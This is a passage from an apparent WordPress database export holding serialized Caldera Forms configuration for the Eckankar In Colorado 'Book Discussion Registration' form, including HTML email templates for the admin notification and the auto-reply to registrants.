16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(38,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:54:25 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8016:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" 